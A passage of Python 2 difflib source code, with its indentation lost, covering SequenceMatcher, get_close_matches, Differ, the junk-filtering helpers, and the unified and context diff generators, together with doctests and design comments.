# isbjunk
# for x in b, isbjunk(x) == isjunk(x) but much faster;
# it's really the __contains__ method of a hidden dict.
# DOES NOT WORK for x in a!
# isbpopular
# for x in b, isbpopular(x) is true iff b is reasonably long
# (at least 200 elements) and x accounts for more than 1 + 1% of
# its elements (when autojunk is enabled).
# DOES NOT WORK for x in a!
self.isjunk = isjunk
self.a = self.b = None
self.autojunk = autojunk
self.set_seqs(a, b)
def set_seqs(self, a, b):
"""Set the two sequences to be compared.
>>> s = SequenceMatcher()
>>> s.set_seqs("abcd", "bcde")
>>> s.ratio()
0.75
"""
self.set_seq1(a)
self.set_seq2(b)
def set_seq1(self, a):
"""Set the first sequence to be compared.
The second sequence to be compared is not changed.
>>> s = SequenceMatcher(None, "abcd", "bcde")
>>> s.ratio()
0.75
>>> s.set_seq1("bcde")
>>> s.ratio()
1.0
>>>
SequenceMatcher computes and caches detailed information about the
second sequence, so if you want to compare one sequence S against
many sequences, use .set_seq2(S) once and call .set_seq1(x)
repeatedly for each of the other sequences.
See also set_seqs() and set_seq2().
"""
if a is self.a:
return
self.a = a
self.matching_blocks = self.opcodes = None
def set_seq2(self, b):
"""Set the second sequence to be compared.
The first sequence to be compared is not changed.
>>> s = SequenceMatcher(None, "abcd", "bcde")
>>> s.ratio()
0.75
>>> s.set_seq2("abcd")
>>> s.ratio()
1.0
>>>
SequenceMatcher computes and caches detailed information about the
second sequence, so if you want to compare one sequence S against
many sequences, use .set_seq2(S) once and call .set_seq1(x)
repeatedly for each of the other sequences.
See also set_seqs() and set_seq1().
"""
if b is self.b:
return
self.b = b
self.matching_blocks = self.opcodes = None
self.fullbcount = None
self.__chain_b()
# For each element x in b, set b2j[x] to a list of the indices in
# b where x appears; the indices are in increasing order; note that
# the number of times x appears in b is len(b2j[x]) ...
# when self.isjunk is defined, junk elements don't show up in this
# map at all, which stops the central find_longest_match method
# from starting any matching block at a junk element ...
# also creates the fast isbjunk function ...
# b2j also does not contain entries for "popular" elements, meaning
# elements that account for more than 1 + 1% of the total elements, and
# when the sequence is reasonably large (>= 200 elements); this can
# be viewed as an adaptive notion of semi-junk, and yields an enormous
# speedup when, e.g., comparing program files with hundreds of
# instances of "return NULL;" ...
# note that this is only called when b changes; so for cross-product
# kinds of matches, it's best to call set_seq2 once, then set_seq1
# repeatedly
def __chain_b(self):
# Because isjunk is a user-defined (not C) function, and we test
# for junk a LOT, it's important to minimize the number of calls.
# Before the tricks described here, __chain_b was by far the most
# time-consuming routine in the whole module! If anyone sees
# Jim Roskind, thank him again for profile.py -- I never would
# have guessed that.
# The first trick is to build b2j ignoring the possibility
# of junk. I.e., we don't call isjunk at all yet. Throwing
# out the junk later is much cheaper than building b2j "right"
# from the start.
b = self.b
self.b2j = b2j = {}
for i, elt in enumerate(b):
indices = b2j.setdefault(elt, [])
indices.append(i)
# Purge junk elements
junk = set()
isjunk = self.isjunk
if isjunk:
for elt in list(b2j.keys()): # using list() since b2j is modified
if isjunk(elt):
junk.add(elt)
del b2j[elt]
# Purge popular elements that are not junk
popular = set()
n = len(b)
if self.autojunk and n >= 200:
ntest = n // 100 + 1
for elt, idxs in list(b2j.items()):
if len(idxs) > ntest:
popular.add(elt)
del b2j[elt]
# Now for x in b, isjunk(x) == x in junk, but the latter is much faster.
# Sicne the number of *unique* junk elements is probably small, the
# memory burden of keeping this set alive is likely trivial compared to
# the size of b2j.
self.isbjunk = junk.__contains__
self.isbpopular = popular.__contains__
def find_longest_match(self, alo, ahi, blo, bhi):
"""Find longest matching block in a[alo:ahi] and b[blo:bhi].
If isjunk is not defined:
Return (i,j,k) such that a[i:i+k] is equal to b[j:j+k], where
alo <= i <= i+k <= ahi
blo <= j <= j+k <= bhi
and for all (i',j',k') meeting those conditions,
k >= k'
i <= i'
and if i == i', j <= j'
In other words, of all maximal matching blocks, return one that
starts earliest in a, and of all those maximal matching blocks that
start earliest in a, return the one that starts earliest in b.
>>> s = SequenceMatcher(None, " abcd", "abcd abcd")
>>> s.find_longest_match(0, 5, 0, 9)
Match(a=0, b=4, size=5)
If isjunk is defined, first the longest matching block is
determined as above, but with the additional restriction that no
junk element appears in the block. Then that block is extended as
far as possible by matching (only) junk elements on both sides. So
the resulting block never matches on junk except as identical junk
happens to be adjacent to an "interesting" match.
Here's the same example as before, but considering blanks to be
junk. That prevents " abcd" from matching the " abcd" at the tail
end of the second sequence directly. Instead only the "abcd" can
match, and matches the leftmost "abcd" in the second sequence:
>>> s = SequenceMatcher(lambda x: x==" ", " abcd", "abcd abcd")
>>> s.find_longest_match(0, 5, 0, 9)
Match(a=1, b=0, size=4)
If no blocks match, return (alo, blo, 0).
>>> s = SequenceMatcher(None, "ab", "c")
>>> s.find_longest_match(0, 2, 0, 1)
Match(a=0, b=0, size=0)
"""
# CAUTION: stripping common prefix or suffix would be incorrect.
# E.g.,
# ab
# acab
# Longest matching block is "ab", but if common prefix is
# stripped, it's "a" (tied with "b"). UNIX(tm) diff does so
# strip, so ends up claiming that ab is changed to acab by
# inserting "ca" in the middle. That's minimal but unintuitive:
# "it's obvious" that someone inserted "ac" at the front.
# Windiff ends up at the same place as diff, but by pairing up
# the unique 'b's and then matching the first two 'a's.
a, b, b2j, isbjunk = self.a, self.b, self.b2j, self.isbjunk
besti, bestj, bestsize = alo, blo, 0
# find longest junk-free match
# during an iteration of the loop, j2len[j] = length of longest
# junk-free match ending with a[i-1] and b[j]
j2len = {}
nothing = []
for i in xrange(alo, ahi):
# look at all instances of a[i] in b; note that because
# b2j has no junk keys, the loop is skipped if a[i] is junk
j2lenget = j2len.get
newj2len = {}
for j in b2j.get(a[i], nothing):
# a[i] matches b[j]
if j < blo:
continue
if j >= bhi:
break
k = newj2len[j] = j2lenget(j-1, 0) + 1
if k > bestsize:
besti, bestj, bestsize = i-k+1, j-k+1, k
j2len = newj2len
# Extend the best by non-junk elements on each end. In particular,
# "popular" non-junk elements aren't in b2j, which greatly speeds
# the inner loop above, but also means "the best" match so far
# doesn't contain any junk *or* popular non-junk elements.
while besti > alo and bestj > blo and \
not isbjunk(b[bestj-1]) and \
a[besti-1] == b[bestj-1]:
besti, bestj, bestsize = besti-1, bestj-1, bestsize+1
while besti+bestsize < ahi and bestj+bestsize < bhi and \
not isbjunk(b[bestj+bestsize]) and \
a[besti+bestsize] == b[bestj+bestsize]:
bestsize += 1
# Now that we have a wholly interesting match (albeit possibly
# empty!), we may as well suck up the matching junk on each
# side of it too. Can't think of a good reason not to, and it
# saves post-processing the (possibly considerable) expense of
# figuring out what to do with it. In the case of an empty
# interesting match, this is clearly the right thing to do,
# because no other kind of match is possible in the regions.
while besti > alo and bestj > blo and \
isbjunk(b[bestj-1]) and \
a[besti-1] == b[bestj-1]:
besti, bestj, bestsize = besti-1, bestj-1, bestsize+1
while besti+bestsize < ahi and bestj+bestsize < bhi and \
isbjunk(b[bestj+bestsize]) and \
a[besti+bestsize] == b[bestj+bestsize]:
bestsize = bestsize + 1
return Match(besti, bestj, bestsize)
def get_matching_blocks(self):
"""Return list of triples describing matching subsequences.
Each triple is of the form (i, j, n), and means that
a[i:i+n] == b[j:j+n]. The triples are monotonically increasing in
i and in j. New in Python 2.5, it's also guaranteed that if
(i, j, n) and (i', j', n') are adjacent triples in the list, and
the second is not the last triple in the list, then i+n != i' or
j+n != j'. IOW, adjacent triples never describe adjacent equal
blocks.
The last triple is a dummy, (len(a), len(b), 0), and is the only
triple with n==0.
>>> s = SequenceMatcher(None, "abxcd", "abcd")
>>> s.get_matching_blocks()
[Match(a=0, b=0, size=2), Match(a=3, b=2, size=2), Match(a=5, b=4, size=0)]
"""
if self.matching_blocks is not None:
return self.matching_blocks
la, lb = len(self.a), len(self.b)
# This is most naturally expressed as a recursive algorithm, but
# at least one user bumped into extreme use cases that exceeded
# the recursion limit on their box. So, now we maintain a list
# ('queue`) of blocks we still need to look at, and append partial
# results to `matching_blocks` in a loop; the matches are sorted
# at the end.
queue = [(0, la, 0, lb)]
matching_blocks = []
while queue:
alo, ahi, blo, bhi = queue.pop()
i, j, k = x = self.find_longest_match(alo, ahi, blo, bhi)
# a[alo:i] vs b[blo:j] unknown
# a[i:i+k] same as b[j:j+k]
# a[i+k:ahi] vs b[j+k:bhi] unknown
if k: # if k is 0, there was no matching block
matching_blocks.append(x)
if alo < i and blo < j:
queue.append((alo, i, blo, j))
if i+k < ahi and j+k < bhi:
queue.append((i+k, ahi, j+k, bhi))
matching_blocks.sort()
# It's possible that we have adjacent equal blocks in the
# matching_blocks list now. Starting with 2.5, this code was added
# to collapse them.
i1 = j1 = k1 = 0
non_adjacent = []
for i2, j2, k2 in matching_blocks:
# Is this block adjacent to i1, j1, k1?
if i1 + k1 == i2 and j1 + k1 == j2:
# Yes, so collapse them -- this just increases the length of
# the first block by the length of the second, and the first
# block so lengthened remains the block to compare against.
k1 += k2
else:
# Not adjacent. Remember the first block (k1==0 means it's
# the dummy we started with), and make the second block the
# new block to compare against.
if k1:
non_adjacent.append((i1, j1, k1))
i1, j1, k1 = i2, j2, k2
if k1:
non_adjacent.append((i1, j1, k1))
non_adjacent.append( (la, lb, 0) )
self.matching_blocks = map(Match._make, non_adjacent)
return self.matching_blocks
def get_opcodes(self):
"""Return list of 5-tuples describing how to turn a into b.
Each tuple is of the form (tag, i1, i2, j1, j2). The first tuple
has i1 == j1 == 0, and remaining tuples have i1 == the i2 from the
tuple preceding it, and likewise for j1 == the previous j2.
The tags are strings, with these meanings:
'replace': a[i1:i2] should be replaced by b[j1:j2]
'delete': a[i1:i2] should be deleted.
Note that j1==j2 in this case.
'insert': b[j1:j2] should be inserted at a[i1:i1].
Note that i1==i2 in this case.
'equal': a[i1:i2] == b[j1:j2]
>>> a = "qabxcd"
>>> b = "abycdf"
>>> s = SequenceMatcher(None, a, b)
>>> for tag, i1, i2, j1, j2 in s.get_opcodes():
... print ("%7s a[%d:%d] (%s) b[%d:%d] (%s)" %
... (tag, i1, i2, a[i1:i2], j1, j2, b[j1:j2]))
delete a[0:1] (q) b[0:0] ()
equal a[1:3] (ab) b[0:2] (ab)
replace a[3:4] (x) b[2:3] (y)
equal a[4:6] (cd) b[3:5] (cd)
insert a[6:6] () b[5:6] (f)
"""
if self.opcodes is not None:
return self.opcodes
i = j = 0
self.opcodes = answer = []
for ai, bj, size in self.get_matching_blocks():
# invariant: we've pumped out correct diffs to change
# a[:i] into b[:j], and the next matching block is
# a[ai:ai+size] == b[bj:bj+size]. So we need to pump
# out a diff to change a[i:ai] into b[j:bj], pump out
# the matching block, and move (i,j) beyond the match
tag = ''
if i < ai and j < bj:
tag = 'replace'
elif i < ai:
tag = 'delete'
elif j < bj:
tag = 'insert'
if tag:
answer.append( (tag, i, ai, j, bj) )
i, j = ai+size, bj+size
# the list of matching blocks is terminated by a
# sentinel with size 0
if size:
answer.append( ('equal', ai, i, bj, j) )
return answer
def get_grouped_opcodes(self, n=3):
""" Isolate change clusters by eliminating ranges with no changes.
Return a generator of groups with up to n lines of context.
Each group is in the same format as returned by get_opcodes().
>>> from pprint import pprint
>>> a = map(str, range(1,40))
>>> b = a[:]
>>> b[8:8] = ['i'] # Make an insertion
>>> b[20] += 'x' # Make a replacement
>>> b[23:28] = [] # Make a deletion
>>> b[30] += 'y' # Make another replacement
>>> pprint(list(SequenceMatcher(None,a,b).get_grouped_opcodes()))
[[('equal', 5, 8, 5, 8), ('insert', 8, 8, 8, 9), ('equal', 8, 11, 9, 12)],
[('equal', 16, 19, 17, 20),
('replace', 19, 20, 20, 21),
('equal', 20, 22, 21, 23),
('delete', 22, 27, 23, 23),
('equal', 27, 30, 23, 26)],
[('equal', 31, 34, 27, 30),
('replace', 34, 35, 30, 31),
('equal', 35, 38, 31, 34)]]
"""
codes = self.get_opcodes()
if not codes:
codes = [("equal", 0, 1, 0, 1)]
# Fixup leading and trailing groups if they show no changes.
if codes[0][0] == 'equal':
tag, i1, i2, j1, j2 = codes[0]
codes[0] = tag, max(i1, i2-n), i2, max(j1, j2-n), j2
if codes[-1][0] == 'equal':
tag, i1, i2, j1, j2 = codes[-1]
codes[-1] = tag, i1, min(i2, i1+n), j1, min(j2, j1+n)
nn = n + n
group = []
for tag, i1, i2, j1, j2 in codes:
# End the current group and start a new one whenever
# there is a large range with no changes.
if tag == 'equal' and i2-i1 > nn:
group.append((tag, i1, min(i2, i1+n), j1, min(j2, j1+n)))
yield group
group = []
i1, j1 = max(i1, i2-n), max(j1, j2-n)
group.append((tag, i1, i2, j1 ,j2))
if group and not (len(group)==1 and group[0][0] == 'equal'):
yield group
def ratio(self):
"""Return a measure of the sequences' similarity (float in [0,1]).
Where T is the total number of elements in both sequences, and
M is the number of matches, this is 2.0*M / T.
Note that this is 1 if the sequences are identical, and 0 if
they have nothing in common.
.ratio() is expensive to compute if you haven't already computed
.get_matching_blocks() or .get_opcodes(), in which case you may
want to try .quick_ratio() or .real_quick_ratio() first to get an
upper bound.
>>> s = SequenceMatcher(None, "abcd", "bcde")
>>> s.ratio()
0.75
>>> s.quick_ratio()
0.75
>>> s.real_quick_ratio()
1.0
"""
matches = reduce(lambda sum, triple: sum + triple[-1],
self.get_matching_blocks(), 0)
return _calculate_ratio(matches, len(self.a) + len(self.b))
def quick_ratio(self):
"""Return an upper bound on ratio() relatively quickly.
This isn't defined beyond that it is an upper bound on .ratio(), and
is faster to compute.
"""
# viewing a and b as multisets, set matches to the cardinality
# of their intersection; this counts the number of matches
# without regard to order, so is clearly an upper bound
if self.fullbcount is None:
self.fullbcount = fullbcount = {}
for elt in self.b:
fullbcount[elt] = fullbcount.get(elt, 0) + 1
fullbcount = self.fullbcount
# avail[x] is the number of times x appears in 'b' less the
# number of times we've seen it in 'a' so far ... kinda
avail = {}
availhas, matches = avail.__contains__, 0
for elt in self.a:
if availhas(elt):
numb = avail[elt]
else:
numb = fullbcount.get(elt, 0)
avail[elt] = numb - 1
if numb > 0:
matches = matches + 1
return _calculate_ratio(matches, len(self.a) + len(self.b))
def real_quick_ratio(self):
"""Return an upper bound on ratio() very quickly.
This isn't defined beyond that it is an upper bound on .ratio(), and
is faster to compute than either .ratio() or .quick_ratio().
"""
la, lb = len(self.a), len(self.b)
# can't have more matches than the number of elements in the
# shorter sequence
return _calculate_ratio(min(la, lb), la + lb)
def get_close_matches(word, possibilities, n=3, cutoff=0.6):
"""Use SequenceMatcher to return list of the best "good enough" matches.
word is a sequence for which close matches are desired (typically a
string).
possibilities is a list of sequences against which to match word
(typically a list of strings).
Optional arg n (default 3) is the maximum number of close matches to
return. n must be > 0.
Optional arg cutoff (default 0.6) is a float in [0, 1]. Possibilities
that don't score at least that similar to word are ignored.
The best (no more than n) matches among the possibilities are returned
in a list, sorted by similarity score, most similar first.
>>> get_close_matches("appel", ["ape", "apple", "peach", "puppy"])
['apple', 'ape']
>>> import keyword as _keyword
>>> get_close_matches("wheel", _keyword.kwlist)
['while']
>>> get_close_matches("apple", _keyword.kwlist)
[]
>>> get_close_matches("accept", _keyword.kwlist)
['except']
"""
if not n > 0:
raise ValueError("n must be > 0: %r" % (n,))
if not 0.0 <= cutoff <= 1.0:
raise ValueError("cutoff must be in [0.0, 1.0]: %r" % (cutoff,))
result = []
s = SequenceMatcher()
s.set_seq2(word)
for x in possibilities:
s.set_seq1(x)
if s.real_quick_ratio() >= cutoff and \
s.quick_ratio() >= cutoff and \
s.ratio() >= cutoff:
result.append((s.ratio(), x))
# Move the best scorers to head of list
result = heapq.nlargest(n, result)
# Strip scores for the best n matches
return [x for score, x in result]
def _count_leading(line, ch):
"""
Return number of `ch` characters at the start of `line`.
Example:
>>> _count_leading(' abc', ' ')
3
"""
i, n = 0, len(line)
while i < n and line[i] == ch:
i += 1
return i
class Differ:
r"""
Differ is a class for comparing sequences of lines of text, and
producing human-readable differences or deltas. Differ uses
SequenceMatcher both to compare sequences of lines, and to compare
sequences of characters within similar (near-matching) lines.
Each line of a Differ delta begins with a two-letter code:
'- ' line unique to sequence 1
'+ ' line unique to sequence 2
' ' line common to both sequences
'? ' line not present in either input sequence
Lines beginning with '? ' attempt to guide the eye to intraline
differences, and were not present in either input sequence. These lines
can be confusing if the sequences contain tab characters.
Note that Differ makes no claim to produce a *minimal* diff. To the
contrary, minimal diffs are often counter-intuitive, because they synch
up anywhere possible, sometimes accidental matches 100 pages apart.
Restricting synch points to contiguous matches preserves some notion of
locality, at the occasional cost of producing a longer diff.
Example: Comparing two texts.
First we set up the texts, sequences of individual single-line strings
ending with newlines (such sequences can also be obtained from the
`readlines()` method of file-like objects):
>>> text1 = ''' 1. Beautiful is better than ugly.
... 2. Explicit is better than implicit.
... 3. Simple is better than complex.
... 4. Complex is better than complicated.
... '''.splitlines(1)
>>> len(text1)
4
>>> text1[0][-1]
'\n'
>>> text2 = ''' 1. Beautiful is better than ugly.
... 3. Simple is better than complex.
... 4. Complicated is better than complex.
... 5. Flat is better than nested.
... '''.splitlines(1)
Next we instantiate a Differ object:
>>> d = Differ()
Note that when instantiating a Differ object we may pass functions to
filter out line and character 'junk'. See Differ.__init__ for details.
Finally, we compare the two:
>>> result = list(d.compare(text1, text2))
'result' is a list of strings, so let's pretty-print it:
>>> from pprint import pprint as _pprint
>>> _pprint(result)
[' 1. Beautiful is better than ugly.\n',
'- 2. Explicit is better than implicit.\n',
'- 3. Simple is better than complex.\n',
'+ 3. Simple is better than complex.\n',
'? ++\n',
'- 4. Complex is better than complicated.\n',
'? ^ ---- ^\n',
'+ 4. Complicated is better than complex.\n',
'? ++++ ^ ^\n',
'+ 5. Flat is better than nested.\n']
As a single multi-line string it looks like this:
>>> print ''.join(result),
1. Beautiful is better than ugly.
- 2. Explicit is better than implicit.
- 3. Simple is better than complex.
+ 3. Simple is better than complex.
? ++
- 4. Complex is better than complicated.
? ^ ---- ^
+ 4. Complicated is better than complex.
? ++++ ^ ^
+ 5. Flat is better than nested.
Methods:
__init__(linejunk=None, charjunk=None)
Construct a text differencer, with optional filters.
compare(a, b)
Compare two sequences of lines; generate the resulting delta.
"""
def __init__(self, linejunk=None, charjunk=None):
"""
Construct a text differencer, with optional filters.
The two optional keyword parameters are for filter functions:
- `linejunk`: A function that should accept a single string argument,
and return true iff the string is junk. The module-level function
`IS_LINE_JUNK` may be used to filter out lines without visible
characters, except for at most one splat ('#'). It is recommended
to leave linejunk None; as of Python 2.3, the underlying
SequenceMatcher class has grown an adaptive notion of "noise" lines
that's better than any static definition the author has ever been
able to craft.
- `charjunk`: A function that should accept a string of length 1. The
module-level function `IS_CHARACTER_JUNK` may be used to filter out
whitespace characters (a blank or tab; **note**: bad idea to include
newline in this!). Use of IS_CHARACTER_JUNK is recommended.
"""
self.linejunk = linejunk
self.charjunk = charjunk
def compare(self, a, b):
r"""
Compare two sequences of lines; generate the resulting delta.
Each sequence must contain individual single-line strings ending with
newlines. Such sequences can be obtained from the `readlines()` method
of file-like objects. The delta generated also consists of newline-
terminated strings, ready to be printed as-is via the writeline()
method of a file-like object.
Example:
>>> print ''.join(Differ().compare('one\ntwo\nthree\n'.splitlines(1),
... 'ore\ntree\nemu\n'.splitlines(1))),
- one
? ^
+ ore
? ^
- two
- three
? -
+ tree
+ emu
"""
cruncher = SequenceMatcher(self.linejunk, a, b)
for tag, alo, ahi, blo, bhi in cruncher.get_opcodes():
if tag == 'replace':
g = self._fancy_replace(a, alo, ahi, b, blo, bhi)
elif tag == 'delete':
g = self._dump('-', a, alo, ahi)
elif tag == 'insert':
g = self._dump('+', b, blo, bhi)
elif tag == 'equal':
g = self._dump(' ', a, alo, ahi)
else:
raise ValueError, 'unknown tag %r' % (tag,)
for line in g:
yield line
def _dump(self, tag, x, lo, hi):
"""Generate comparison results for a same-tagged range."""
for i in xrange(lo, hi):
yield '%s %s' % (tag, x[i])
def _plain_replace(self, a, alo, ahi, b, blo, bhi):
assert alo < ahi and blo < bhi
# dump the shorter block first -- reduces the burden on short-term
# memory if the blocks are of very different sizes
if bhi - blo < ahi - alo:
first = self._dump('+', b, blo, bhi)
second = self._dump('-', a, alo, ahi)
else:
first = self._dump('-', a, alo, ahi)
second = self._dump('+', b, blo, bhi)
for g in first, second:
for line in g:
yield line
def _fancy_replace(self, a, alo, ahi, b, blo, bhi):
r"""
When replacing one block of lines with another, search the blocks
for *similar* lines; the best-matching pair (if any) is used as a
synch point, and intraline difference marking is done on the
similar pair. Lots of work, but often worth it.
Example:
>>> d = Differ()
>>> results = d._fancy_replace(['abcDefghiJkl\n'], 0, 1,
... ['abcdefGhijkl\n'], 0, 1)
>>> print ''.join(results),
- abcDefghiJkl
? ^ ^ ^
+ abcdefGhijkl
? ^ ^ ^
"""
# don't synch up unless the lines have a similarity score of at
# least cutoff; best_ratio tracks the best score seen so far
best_ratio, cutoff = 0.74, 0.75
cruncher = SequenceMatcher(self.charjunk)
eqi, eqj = None, None # 1st indices of equal lines (if any)
# search for the pair that matches best without being identical
# (identical lines must be junk lines, & we don't want to synch up
# on junk -- unless we have to)
for j in xrange(blo, bhi):
bj = b[j]
cruncher.set_seq2(bj)
for i in xrange(alo, ahi):
ai = a[i]
if ai == bj:
if eqi is None:
eqi, eqj = i, j
continue
cruncher.set_seq1(ai)
# computing similarity is expensive, so use the quick
# upper bounds first -- have seen this speed up messy
# compares by a factor of 3.
# note that ratio() is only expensive to compute the first
# time it's called on a sequence pair; the expensive part
# of the computation is cached by cruncher
if cruncher.real_quick_ratio() > best_ratio and \
cruncher.quick_ratio() > best_ratio and \
cruncher.ratio() > best_ratio:
best_ratio, best_i, best_j = cruncher.ratio(), i, j
if best_ratio < cutoff:
# no non-identical "pretty close" pair
if eqi is None:
# no identical pair either -- treat it as a straight replace
for line in self._plain_replace(a, alo, ahi, b, blo, bhi):
yield line
return
# no close pair, but an identical pair -- synch up on that
best_i, best_j, best_ratio = eqi, eqj, 1.0
else:
# there's a close pair, so forget the identical pair (if any)
eqi = None
# a[best_i] very similar to b[best_j]; eqi is None iff they're not
# identical
# pump out diffs from before the synch point
for line in self._fancy_helper(a, alo, best_i, b, blo, best_j):
yield line
# do intraline marking on the synch pair
aelt, belt = a[best_i], b[best_j]
if eqi is None:
# pump out a '-', '?', '+', '?' quad for the synched lines
atags = btags = ""
cruncher.set_seqs(aelt, belt)
for tag, ai1, ai2, bj1, bj2 in cruncher.get_opcodes():
la, lb = ai2 - ai1, bj2 - bj1
if tag == 'replace':
atags += '^' * la
btags += '^' * lb
elif tag == 'delete':
atags += '-' * la
elif tag == 'insert':
btags += '+' * lb
elif tag == 'equal':
atags += ' ' * la
btags += ' ' * lb
else:
raise ValueError, 'unknown tag %r' % (tag,)
for line in self._qformat(aelt, belt, atags, btags):
yield line
else:
# the synch pair is identical
yield ' ' + aelt
# pump out diffs from after the synch point
for line in self._fancy_helper(a, best_i+1, ahi, b, best_j+1, bhi):
yield line
def _fancy_helper(self, a, alo, ahi, b, blo, bhi):
g = []
if alo < ahi:
if blo < bhi:
g = self._fancy_replace(a, alo, ahi, b, blo, bhi)
else:
g = self._dump('-', a, alo, ahi)
elif blo < bhi:
g = self._dump('+', b, blo, bhi)
for line in g:
yield line
def _qformat(self, aline, bline, atags, btags):
r"""
Format "?" output and deal with leading tabs.
Example:
>>> d = Differ()
>>> results = d._qformat('\tabcDefghiJkl\n', '\tabcdefGhijkl\n',
... ' ^ ^ ^ ', ' ^ ^ ^ ')
>>> for line in results: print repr(line)
...
'- \tabcDefghiJkl\n'
'? \t ^ ^ ^\n'
'+ \tabcdefGhijkl\n'
'? \t ^ ^ ^\n'
"""
# Can hurt, but will probably help most of the time.
common = min(_count_leading(aline, "\t"),
_count_leading(bline, "\t"))
common = min(common, _count_leading(atags[:common], " "))
common = min(common, _count_leading(btags[:common], " "))
atags = atags[common:].rstrip()
btags = btags[common:].rstrip()
yield "- " + aline
if atags:
yield "? %s%s\n" % ("\t" * common, atags)
yield "+ " + bline
if btags:
yield "? %s%s\n" % ("\t" * common, btags)
# With respect to junk, an earlier version of ndiff simply refused to
# *start* a match with a junk element. The result was cases like this:
# before: private Thread currentThread;
# after: private volatile Thread currentThread;
# If you consider whitespace to be junk, the longest contiguous match
# not starting with junk is "e Thread currentThread". So ndiff reported
# that "e volatil" was inserted between the 't' and the 'e' in "private".
# While an accurate view, to people that's absurd. The current version
# looks for matching blocks that are entirely junk-free, then extends the
# longest one of those as far as possible but only with matching junk.
# So now "currentThread" is matched, then extended to suck up the
# preceding blank; then "private" is matched, and extended to suck up the
# following blank; then "Thread" is matched; and finally ndiff reports
# that "volatile " was inserted before "Thread". The only quibble
# remaining is that perhaps it was really the case that " volatile"
# was inserted after "private". I can live with that <wink>.
import re
def IS_LINE_JUNK(line, pat=re.compile(r"\s*#?\s*$").match):
r"""
Return 1 for ignorable line: iff `line` is blank or contains a single '#'.
Examples:
>>> IS_LINE_JUNK('\n')
True
>>> IS_LINE_JUNK(' # \n')
True
>>> IS_LINE_JUNK('hello\n')
False
"""
return pat(line) is not None
def IS_CHARACTER_JUNK(ch, ws=" \t"):
r"""
Return 1 for ignorable character: iff `ch` is a space or tab.
Examples:
>>> IS_CHARACTER_JUNK(' ')
True
>>> IS_CHARACTER_JUNK('\t')
True
>>> IS_CHARACTER_JUNK('\n')
False
>>> IS_CHARACTER_JUNK('x')
False
"""
return ch in ws
########################################################################
### Unified Diff
########################################################################
def _format_range_unified(start, stop):
'Convert range to the "ed" format'
# Per the diff spec at http://www.unix.org/single_unix_specification/
beginning = start + 1 # lines start numbering with one
length = stop - start
if length == 1:
return '{}'.format(beginning)
if not length:
beginning -= 1 # empty ranges begin at line just before the range
return '{},{}'.format(beginning, length)
def unified_diff(a, b, fromfile='', tofile='', fromfiledate='',
tofiledate='', n=3, lineterm='\n'):
r"""
Compare two sequences of lines; generate the delta as a unified diff.
Unified diffs are a compact way of showing line changes and a few
lines of context. The number of context lines is set by 'n' which
defaults to three.
By default, the diff control lines (those with ---, +++, or @@) are
created with a trailing newline. This is helpful so that inputs
created from file.readlines() result in diffs that are suitable for
file.writelines() since both the inputs and outputs have trailing
newlines.
For inputs that do not have trailing newlines, set the lineterm
argument to "" so that the output will be uniformly newline free.
The unidiff format normally has a header for filenames and modification
times. Any or all of these may be specified using strings for
'fromfile', 'tofile', 'fromfiledate', and 'tofiledate'.
The modification times are normally expressed in the ISO 8601 format.
Example:
>>> for line in unified_diff('one two three four'.split(),
... 'zero one tree four'.split(), 'Original', 'Current',
... '2005-01-26 23:30:50', '2010-04-02 10:20:52',
... lineterm=''):
... print line # doctest: +NORMALIZE_WHITESPACE
--- Original 2005-01-26 23:30:50
+++ Current 2010-04-02 10:20:52
@@ -1,4 +1,4 @@
+zero
one
-two
-three
+tree
four
"""
started = False
for group in SequenceMatcher(None,a,b).get_grouped_opcodes(n):
if not started:
started = True
fromdate = '\t{}'.format(fromfiledate) if fromfiledate else ''
todate = '\t{}'.format(tofiledate) if tofiledate else ''
yield '--- {}{}{}'.format(fromfile, fromdate, lineterm)
yield '+++ {}{}{}'.format(tofile, todate, lineterm)
first, last = group[0], group[-1]
file1_range = _format_range_unified(first[1], last[2])
file2_range = _format_range_unified(first[3], last[4])
yield '@@ -{} +{} @@{}'.format(file1_range, file2_range, lineterm)
for tag, i1, i2, j1, j2 in group:
if tag == 'equal':
for line in a[i1:i2]:
yield ' ' + line
continue
if tag in ('replace', 'delete'):
for line in a[i1:i2]:
yield '-' + line
if tag in ('replace', 'insert'):
for line in b[j1:j2]:
yield '+' + line
########################################################################
### Context Diff
########################################################################
def _format_range_context(start, stop):
'Convert range to the "ed" format'
# Per the diff spec at http://www.unix.org/single_unix_specification/
beginning = start + 1 # lines start numbering with one
length = stop - start
if not length:
beginning -= 1 # empty ranges begin at line just before the range
if length <= 1:
return '{}'.format(beginning)
return '{},{}'.format(beginning, beginning + length - 1)
# See http://www.unix.org/single_unix_specification/
def context_diff(a, b, fromfile='', tofile='',
fromfiledate='', tofiledate='', n=3, lineterm='\n'):
r"""
Compare two sequences of lines; generate the delta as a context diff.
Context diffs are a compact way of showing line changes and a few
lines of context. The number of context lines is set by 'n' which
defaults to three.
By default, the diff control lines (those with *** or ---) are
created with a trailing newline. This is helpful so that inputs
created from file.readlines() result in diffs that are suitable for
file.writelines() since both the inputs and outputs have trailing
newlines.
For inputs that do not have trailing newlines, set the lineterm
argument to "" so that the output will be uniformly newline free.
The context diff format normally has a header for filenames and
modification times. Any or all of these may be specified using
strings for 'fromfile', 'tofile', 'fromfiledate', and 'tofiledate'.
The modification times are normally expressed in the ISO 8601 format.
If not specified, the strings default to blanks.
Example:
>>> print ''.join(context_diff('one\ntwo\nthree\nfour\n'.splitlines(1),
... 'zero\none\ntree\nfour\n'.splitlines(1), 'Original', 'Current')),
*** Original
--- Current
***************
*** 1,4 ****
one
! two
! three
four
--- 1,4 ----
+ zero
one
! tree
four
"""
prefix = dict(insert='+ ', delete='- ', replace='! ', equal=' ')
started = False
for group in SequenceMatcher(None,a,b).get_grouped_opcodes(n):
if not started:
started = True
fromdate = '\t{}'.format(fromfiledate) if fromfiledate else ''
todate = '\t{}'.format(tofiledate) if tofiledate else ''
yield '*** {}{}{}'.format(fromfile, fromdate, lineterm)
yield '--- {}{}{}'.format(tofile, todate, lineterm)
first, last = group[0], group[-1]
yield '***************' + lineterm
file1_range = _format_range_context(first[1], last[2])
yield '*** {} ****{}'.format(file1_range, lineterm)
if any(tag in ('replace', 'delete') for tag, _, _, _, _ in group):
for tag, i1, i2, _, _ in group:
if tag != 'insert':
for line in a[i1:i2]:
yield prefix[tag] + line
file2_range = _format_range_context(first[3], last[4])
yield '--- {} ----{}'.format(file2_range, lineterm)
if any(tag in ('replace', 'insert') for tag, _, _, _, _ in group):
for tag, _, _, j1, j2 in group:
if tag != 'delete':
for line in b[j1:j2]:
yield prefix[tag] + line
